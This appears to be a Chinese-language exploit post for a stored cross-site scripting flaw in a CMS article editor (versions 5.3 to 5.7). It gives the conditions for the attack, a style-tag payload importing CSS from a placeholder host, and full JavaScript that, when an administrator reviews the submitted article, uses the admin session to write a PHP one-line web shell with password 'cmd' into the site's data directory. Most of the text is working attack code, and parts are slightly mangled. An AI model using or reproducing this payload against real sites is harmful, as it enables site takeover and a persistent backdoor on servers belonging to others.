漏洞原因:由於編輯器過濾不嚴,將導致惡意腳本運行
目前只是測試過5.3到5.7版本。其他更早的版本大家就自由發揮吧。
下面說說利用方法。
條件有3個:
1.開啓註冊
2.開啓投稿
3.管理員很勤勞,會去審覈文章,最雞肋的地方了
註冊會員—-發表文章
內容填寫:
<style>@im\port’\http://xxx.com/xss.css’;</style>
新建XSS.CXX
body{
background-p_w_picpath:url('javascript:document.write("")')
}
新建xss.js
內容
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split('/')
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){
var url= "/"+u+"/sys_sql_query.php";
var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);
}
當管理員審覈這篇文章的時候,將自動在data目錄生成一句話haris.php。密碼cmd